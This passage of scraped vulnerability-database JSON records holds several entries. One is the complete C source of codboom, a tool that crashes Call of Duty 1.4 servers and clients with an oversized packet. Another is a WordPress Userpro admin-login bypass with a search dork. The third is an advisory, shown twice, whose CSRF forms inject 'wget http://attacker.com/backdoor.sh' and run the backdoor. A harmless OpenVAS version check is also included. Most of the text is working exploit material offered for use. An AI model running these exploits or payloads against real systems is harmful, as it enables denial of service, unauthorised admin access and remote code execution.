unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n/* codboom.c */\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include <io.h>\r\n #include <malloc.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define BUFFSZ 2048\r\n#define PORT 28960\r\n#define TIMEOUT 3\r\n#define INFO \"\\xff\\xff\\xff\\xff\" \"getinfo xxx\\n\"\r\n#define BOOM \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\r\n // must be major than 1023 bytes\r\n#define SVBOF \"\\xff\\xff\\xff\\xff\" \"getinfo %s\\n\"\r\n#define CLBOF \"\\xff\\xff\\xff\\xff\" \\\r\n \"%sResponse\\n\" \\\r\n \"\\\\g_gametype\\\\dm\" \\\r\n \"\\\\gamename\\\\Call of Duty\" \\\r\n \"\\\\mapname\\\\mp_carentan\" \\\r\n \"\\\\protocol\\\\5\" \\\r\n \"\\\\scr_friendlyfire\\\\0\" \\\r\n \"\\\\scr_killcam\\\\0\" \\\r\n \"\\\\shortversion\\\\1.4\" \\\r\n \"\\\\sv_allowAnonymous\\\\0\" \\\r\n \"\\\\sv_floodProtect\\\\1\" \\\r\n \"\\\\sv_hostname\\\\Crash\" \\\r\n \"\\\\sv_maxclients\\\\26\" \\\r\n \"\\\\sv_maxPing\\\\0\" \\\r\n \"\\\\sv_maxRate\\\\10000\" \\\r\n \"\\\\sv_minPing\\\\0\" \\\r\n \"\\\\sv_privateClients\\\\0\" \\\r\n \"\\\\sv_punkbuster\\\\1\" \\\r\n \"\\\\sv_pure\\\\1\" \\\r\n \"\\\\pswrd\\\\0\" \\\r\n \"\\\\mod\\\\1\" \\\r\n \"\\\\crash\\\\%s\"\r\n\r\n\r\n\r\nvoid show_info(u_char *buff);\r\nint timeout(int sock);\r\nu_long resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n int sd,\r\n len,\r\n psz,\r\n on = 1,\r\n type;\r\n u_short port = PORT;\r\n u_char buff[BUFFSZ + 1];\r\n struct sockaddr_in peer;\r\n\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Call of Duty <= 1.4 server/client shutdown \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\nUsage: %s <attack> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Attack:\\n\"\r\n \" c = broadcast clients shutdown\\n\"\r\n \" s = server shutdown\\n\"\r\n \" You must add the IP or the hostname of the server after the 's'.\\n\"\r\n \"\\n\"\r\n \"Some usage examples:\\n\"\r\n \" codboom c listens on port %d for clients\\n\"\r\n \" codboom c 1234 listens on port 1234\\n\"\r\n \" codboom s 192.168.0.1 tests the server 192.168.0.1 on port %d\\n\"\r\n \" codboom s codserver 1234 tests the server codserver on port 1234\\n\"\r\n \"\\n\", argv[0], PORT, PORT, PORT);\r\n exit(1);\r\n }\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif \r\n\r\n type = argv[1][0];\r\n if(type == 's') {\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Error: you must specify the server IP or hostname.\\n\"\r\n \" Example: %s s localhost\\n\"\r\n \"\\n\", argv[0]);\r\n exit(1);\r\n }\r\n peer.sin_addr.s_addr = resolv(argv[2]);\r\n if(argc > 3) port = atoi(argv[3]);\r\n printf(\"\\n- Target %s:%hu\\n\",\r\n inet_ntoa(peer.sin_addr),\r\n port);\r\n\r\n } else if(type == 'c') {\r\n peer.sin_addr.s_addr = INADDR_ANY;\r\n if(argc > 2) port = atoi(argv[2]);\r\n printf(\"\\n- Listen on port %d\\n\", port);\r\n\r\n } else {\r\n fputs(\"\\n\"\r\n \"Error: Wrong type of chosen attack.\\n\"\r\n \" You can choose between 2 types of attacks, passive versus clients with\\n\"\r\n \" 'c' or versus servers with 's'\\n\"\r\n \"\\n\", stdout);\r\n exit(1);\r\n }\r\n\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n psz = sizeof(peer);\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n if(type == 's') {\r\n fputs(\"- Request informations\\n\", stdout);\r\n if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\n\"\r\n \"Error: socket timeout, probably the server is not online or the port is wrong\\n\"\r\n \"\\n\", stdout);\r\n exit(1);\r\n }\r\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n show_info(buff);\r\n\r\n fputs(\"- Send BOOM packet\\n\", stdout);\r\n len = sprintf(buff, SVBOF, BOOM);\r\n if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\nServer IS vulnerable!!!\\n\\n\", stdout);\r\n } else {\r\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n printf(\"\\n\"\r\n \"Server doesn't seem to be vulnerable, the following is the answer received:\\n\"\r\n \"\\n%s\\n\\n\", buff);\r\n }\r\n } else {\r\n if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))\r\n < 0) std_err();\r\n if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n fputs(\" Clients:\\n\", stdout);\r\n for(;;) {\r\n len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n\r\n printf(\"%16s:%hu -> %s\\n\",\r\n inet_ntoa(peer.sin_addr),\r\n ntohs(peer.sin_port),\r\n buff);\r\n\r\n if(!memcmp(buff + 4, \"getinfo\", 7)) {\r\n len = sprintf(buff, CLBOF, \"info\", BOOM);\r\n } else {\r\n len = sprintf(buff, CLBOF, \"status\", BOOM);\r\n }\r\n if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n }\r\n }\r\n\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n\r\n\r\nvoid show_info(u_char *buff) {\r\n int nt = 1;\r\n u_char *string;\r\n\r\n while((string = strchr(buff, '\\\\'))) {\r\n *string = 0x00;\r\n if(!nt) {\r\n printf(\"%30s: \", buff);\r\n nt++;\r\n } else {\r\n printf(\"%s\\n\", buff);\r\n nt = 0;\r\n }\r\n buff = string + 1;\r\n }\r\n printf(\"%s\\n\", buff);\r\n}\r\n\r\n\r\n\r\n\r\nint timeout(int sock) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n int err;\r\n\r\n tout.tv_sec = TIMEOUT;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\r\n if(err < 0) std_err();\r\n if(!err) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n\r\nu_long resolv(char *host) {\r\n struct hostent *hp;\r\n u_long host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_long *)(hp->h_addr);\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n# 0day.today [2018-04-04] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "939ad61322c6011a78b807d828c2caef", "key": "description"}, {"hash": "e2900be7b904b6cb4baea1c38c00cf86", "key": "href"}, {"hash": "619318fadde833ee77a53ae1fee56d32", "key": "modified"}, {"hash": "619318fadde833ee77a53ae1fee56d32", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5a856d8508314549fc011ddb2462253e", "key": "reporter"}, {"hash": "686b25390267b5dd8a71adcda093ff2b", "key": "sourceData"}, {"hash": "c5b84d6d56faead77cf51aaefa7e01a8", "key": "sourceHref"}, {"hash": "888babac088d40ba4e1d76e7b342e511", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-02-18T21:28:04", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-11-06T00:00:00", "published": "2017-11-06T00:00:00", "href": "https://0day.today/exploit/description/28960", "id": "1337DAY-ID-28960", "type": "zdt", "title": "WordPress Userpro Plugin < 4.9.17.1 - Authentication Bypass Vulnerability", "sourceData": "# Exploit Title: Userpro \u2013 WordPress Plugin \u2013 Authentication Bypass\r\n# Google Dork: inurl:/plugins/userpro\r\n# Date: 11.04.2017\r\n# Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)\r\n# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9\r\n# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9\r\n# Version: <= 4.6.17\r\n# Tested on: Wordpress 4.8.3\r\n# CVE : requested, not assigned yet.\r\n \r\nDescription\r\n================================================================================\r\n The userpro plugin has the ability to bypass login authentication for the user\r\n 'admin'. If the site does not use the standard username 'admin' it is not affected.\r\n \r\nPoC\r\n================================================================================\r\n1 - Google Dork inurl:/plugins/userpro\r\n \r\n2 - Browse to a site that has the userpro plugin installed.\r\n \r\n3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true\r\n \r\n4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in\r\nwill full administrator access.\r\n================================================================================\r\n \r\n10/25/2017 \u2013 Wordfence notified of issue by Iain Hadgraft.\r\n10/26/2017 \u2013 Vendor resolved the issue in the plugin.\r\n11/04/2017 - Disclosure.\n\n# 0day.today [2018-02-18] #", "sourceHref": "https://0day.today/exploit/28960", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-11T05:17:36", "bulletinFamily": "exploit", "description": "Smartphone Pentest Framework (SPF) versions 0.1.3 and 0.1.4 suffer from an OS command injection vulnerability.", "modified": "2012-12-12T00:00:00", "published": "2012-12-12T00:00:00", "id": "1337DAY-ID-19942", "href": "https://0day.today/exploit/description/19942", "type": "zdt", "title": "Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection", "sourceData": "Product: Smartphone Pentest Framework (SPF)\r\nVendor: Bulb Security LLC\r\nVulnerable Versions: 0.1.3, 0.1.4 and probably prior\r\nTested Versions: 0.1.3, 0.1.4\r\nVendor Notification: November 19, 2012 \r\nPublic Disclosure: December 10, 2012 \r\nVulnerability Type: OS Command Injection [CWE-78]\r\nCVE Reference: CVE-2012-5878\r\nCVSSv2 Base Score: 8.3 (AV:A/AC:L/Au:N/C:C/I:C/A:C)\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine remotely. \r\n\r\nSimilar vulnerabilities were discovered (https://www.htbridge.com/advisory/HTB23123 , CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor. \r\n\r\nHowever, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. Therefore even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for the majority of pentesters) the vulnerabilities can still be easily exploited via a local/internal network, or even from the Internet via CSRF vector. In default installation of Smartphone Pentest Framework its web server port and application path of its GUI are easily predictable: localhost:80/frameworkgui/\r\n\r\nPlease refer to HTB23123 advisory (https://www.htbridge.com/advisory/HTB23122) for detailed attack scenarios examples.\r\n\r\n\r\n1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5878\r\n\r\nMultiple Perl scripts in the \"/frameworkgui/\" directory do not perform sanitation of user-supplied input passed as argument to the \"system()\" function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server user. \r\n\r\n1.1 The vulnerability exists in \"SEAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector. \r\n\r\nThe PoC code below will download a backdoor located on 'attacker.com' and run it on pentester's machine with privileges of the web server. Despite relatively low privileges attacker can always try to download all files accessible to him and/or escalate privileges to get remote root access to the system. \r\n\r\n\r\n<form action=\"http://localhost/cgi-bin/frameworkgui/SEAttack.pl\" method=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"platformDD2\" value='android' />\r\n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.ch && ./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.2 The vulnerability exists in \"CSAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action=\"http://localhost/cgi-bin/frameworkgui/CSAttack.pl\" method=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.3 The vulnerability exists in \"attachMobileModem.pl\" script due to insufficient validation of user-supplied input passed via the \"appURLPath\" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action=\"http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl\" method=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"appURLPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.4 The vulnerability exists in \"guessPassword.pl\" script due to insufficient validation of user-supplied input passed via the \"ipAddressTB\" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action=\"http://localhost/cgi-bin/frameworkgui/guessPassword.pl\" method=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"ipAddressTB\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nOn December 5, 2012 vendor replied that vulnerabilities are patched. However, on the Disclosure date version 0.1.4 was still found to be vulnerable.\r\n\r\nAs a temporary solution remove or disable SPF's GUI.\r\n\r\n-----------------------------------------------------------------------------------------------\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19942"}], "openvas": [{"lastseen": "2019-03-20T22:37:47", "bulletinFamily": "scanner", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-03-19T00:00:00", "published": "2015-10-29T00:00:00", "id": "OPENVAS:1361412562310806154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806154", "title": "Apple Mac OS X Multiple Vulnerabilities-02 October-15", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_macosx_mult_vuln02_oct15.nasl 14304 2019-03-19 09:10:40Z cfischer $\n#\n# Apple Mac OS X Multiple Vulnerabilities-02 October-15\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806154\");\n script_version(\"$Revision: 14304 $\");\n script_cve_id(\"CVE-2015-7761\", \"CVE-2015-7760\", \"CVE-2015-5922\", \"CVE-2015-5917\",\n \"CVE-2015-5915\", \"CVE-2015-5914\", \"CVE-2015-5913\", \"CVE-2015-5902\",\n \"CVE-2015-5901\", \"CVE-2015-5900\", \"CVE-2015-5897\", \"CVE-2015-5894\",\n \"CVE-2015-5893\", \"CVE-2015-5891\", \"CVE-2015-5890\", \"CVE-2015-5889\",\n \"CVE-2015-5888\", \"CVE-2015-5887\", \"CVE-2015-5884\", \"CVE-2015-5883\",\n \"CVE-2015-5878\", \"CVE-2015-5877\", \"CVE-2015-5875\", \"CVE-2015-5873\",\n \"CVE-2015-5872\", \"CVE-2015-5871\", \"CVE-2015-5870\", \"CVE-2015-5866\",\n \"CVE-2015-5865\", \"CVE-2015-5864\", \"CVE-2015-5854\", \"CVE-2015-5853\",\n \"CVE-2015-5849\", \"CVE-2015-5836\", \"CVE-2015-5833\", \"CVE-2015-5830\",\n \"CVE-2015-3785\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 10:10:40 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-29 13:24:34 +0530 (Thu, 29 Oct 2015)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-02 October-15\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details refer\n reference section.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to obtain sensitive information, execute arbitrary code, bypass intended launch\n restrictions and access restrictions, cause a denial of service, write to\n arbitrary files, execute arbitrary code with system privilege.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.6.8 through\n 10.11\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.11 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT205267\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2015/Sep/msg00008.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.([6-9|10)\\.\");\n script_xref(name:\"URL\", value:\"https://www.apple.com\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer)\n exit(0);\n\nif(\"Mac OS X\" >< osName)\n{\n if(version_in_range(version:osVer, test_version:\"10.6.8\", test_version2:\"10.10.5\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.11\");\n security_message(data:report);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:49", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2012-12-11T00:00:00", "published": "2012-12-11T00:00:00", "id": "SECURITYVULNS:VULN:12773", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12773", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23127\r\nProduct: Smartphone Pentest Framework (SPF)\r\nVendor: Bulb Security LLC\r\nVulnerable Versions: 0.1.3, 0.1.4 and probably prior\r\nTested Versions: 0.1.3, 0.1.4\r\nVendor Notification: November 19, 2012 \r\nPublic Disclosure: December 10, 2012 \r\nVulnerability Type: OS Command Injection [CWE-78]\r\nCVE Reference: CVE-2012-5878\r\nCVSSv2 Base Score: 8.3 (AV:A/AC:L/Au:N/C:C/I:C/A:C)\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine remotely. \r\n\r\nSimilar vulnerabilities were discovered (https://www.htbridge.com/advisory/HTB23123 , CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor. \r\n\r\nHowever, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. Therefore even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for the majority of pentesters) the vulnerabilities can still be easily exploited via a local/internal network, or even from the Internet via CSRF vector. In default installation of Smartphone Pentest Framework its web server port and application path of its GUI are easily predictable: localhost:80/frameworkgui/\r\n\r\nPlease refer to HTB23123 advisory (https://www.htbridge.com/advisory/HTB23122) for detailed attack scenarios examples.\r\n\r\n\r\n1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5878\r\n\r\nMultiple Perl scripts in the "/frameworkgui/" directory do not perform sanitation of user-supplied input passed as argument to the "system()" function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server user. \r\n\r\n1.1 The vulnerability exists in "SEAttack.pl" script due to insufficient validation of user-supplied input passed via the "hostingPath" parameter. The vulnerability can be exploited remotely via CSRF vector. \r\n\r\nThe PoC code below will download a backdoor located on 'attacker.com' and run it on pentester's machine with privileges of the web server. Despite relatively low privileges attacker can always try to download all files accessible to him and/or escalate privileges to get remote root access to the system. \r\n\r\n\r\n<form action="http://localhost/cgi-bin/frameworkgui/SEAttack.pl" method="post" name=f1>\r\n<input type="hidden" name="platformDD2" value='android' />\r\n<input type="hidden" name="hostingPath" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.ch && ./backdoor.sh & ' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.2 The vulnerability exists in "CSAttack.pl" script due to insufficient validation of user-supplied input passed via the "hostingPath" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action="http://localhost/cgi-bin/frameworkgui/CSAttack.pl" method="post" name=f1>\r\n<input type="hidden" name="hostingPath" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.3 The vulnerability exists in "attachMobileModem.pl" script due to insufficient validation of user-supplied input passed via the "appURLPath" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action="http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl" method="post" name=f1>\r\n<input type="hidden" name="appURLPath" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.4 The vulnerability exists in "guessPassword.pl" script due to insufficient validation of user-supplied input passed via the "ipAddressTB" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action="http://localhost/cgi-bin/frameworkgui/guessPassword.pl" method="post" name=f1>\r\n<input type="hidden" name="ipAddressTB" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nOn December 5, 2012 vendor replied that vulnerabilities are patched. However, on the Disclosure date version 0.1.4 was still found to be vulnerable.\r\n\r\nAs a temporary solution remove or disable SPF's GUI.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23127 - https://www.htbridge.com/advisory/HTB23127 - Multiple Vulnerabilities in Smartphone Pentest Framework (SPF).\r\n[2] Smartphone Pentest Framework (SPF) - http://www.bulbsecurity.com/smartphone-pentest-framework/ - Smartphone Pentest Framework is an open source security tool, designed to aid in assessing the security posture of smartphones in an 